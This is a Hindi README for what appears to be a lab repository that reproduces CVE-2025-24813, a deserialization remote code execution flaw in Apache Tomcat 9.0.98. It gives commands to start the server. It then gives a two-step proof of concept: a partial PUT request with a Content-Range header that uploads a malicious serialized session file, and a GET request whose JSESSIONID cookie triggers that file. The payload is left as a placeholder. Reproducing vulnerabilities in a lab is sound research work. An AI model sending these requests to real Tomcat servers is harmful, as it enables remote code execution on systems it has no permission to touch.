
tomcat CVE-2025-24813 डीसीरियलाइज़ेशन RCE वातावरण
यह रिपॉजिटरी CVE-2025-24813 Tomcat नवीनतम RCE के पुनरुत्पादन के लिए वातावरण है।
केवल सीखने और अनुसंधान के लिए उपयोग करें!
इस वातावरण में ऊपर उल्लिखित पुनरुत्पादन हेतु आवश्यक शर्तें सक्षम की गई हैं
Linux:
chmod +x apache-tomcat-9.0.98/bin/*
apache-tomcat-9.0.98/bin/catalina.sh run
Windows:
apache-tomcat-9.0.98/bin/catalina.bat run
पहुँचें: http://127.0.0.1:9001/
एक दुर्भावनापूर्ण सीरियलाइज़्ड फ़ाइल उत्पन्न करें, निम्नलिखित पैकेट का उपयोग करके अपलोड करें, ध्यान दें कि Range का ब्लॉक मान Length के समान होना चाहिए, और वर्तमान फ़ाइल की लंबाई से अधिक होना चाहिए।
PUT /xxxxx/session HTTP/1.1
Host: 192.168.131.32:8080
Content-Length: 1000
Content-Range: bytes 0-1000/1200
{{反序列化文件内容)}}
निम्नलिखित POC का उपयोग करके ट्रिगर करें:
GET / HTTP/1.1
Host: 192.168.131.32:8080
Cookie: JSESSIONID=.xxxxx

